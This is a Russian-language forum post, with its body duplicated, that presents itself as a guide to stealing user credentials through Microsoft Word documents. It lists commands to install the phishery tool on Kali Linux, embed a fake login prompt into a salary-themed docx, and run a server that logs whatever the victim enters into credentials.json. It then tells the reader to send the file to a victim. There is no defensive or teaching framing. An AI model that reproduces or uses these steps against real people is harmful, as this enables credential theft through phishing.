OldRasta
Интересующийся
Интересующийся
OldRasta
Интересующийся
Интересующийся
- Сообщения
- 62
- Реакции
- 135
Как получить учетные данные пользователя через Microsoft Word
Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.
Установка в Kali Linux:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery
Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.
После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u -i zarplata.docx -o zarplata_phish.docx
Запускаем сервер, для получения и сохранения аутентификационных данных:
$ ./phishery -s settings.json -c credentials.json
Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
Phishery встраивает в существующий документ Microsoft Word появляющееся окно с требованием ввести имя пользователя и пароль.
Установка в Kali Linux:
$ apt-get install phishery
$ mkdir phishery
$ tar -xvf phishery.tar.gz --strip=1 -C ./phishery
cd phishery
Открываем файл настроек (settings.json), в настройках нам нужно указать:
port — порт, на котором будет работать сервер.
После настройки phishery, загружаем на сервер файл в формате docx, в который мы встроим фишинговый код:
./phishery -u -i zarplata.docx -o zarplata_phish.docx
Запускаем сервер, для получения и сохранения аутентификационных данных:
$ ./phishery -s settings.json -c credentials.json
Теперь отправляем файл жертве и ждем открытия. При открытии файла, поверх MS Word появится окно запроса имени и пароля. При вводе любых данных и нажатии OK, мы получим эти данные и они отобразятся в логах и запишутся в файл credentials.json.
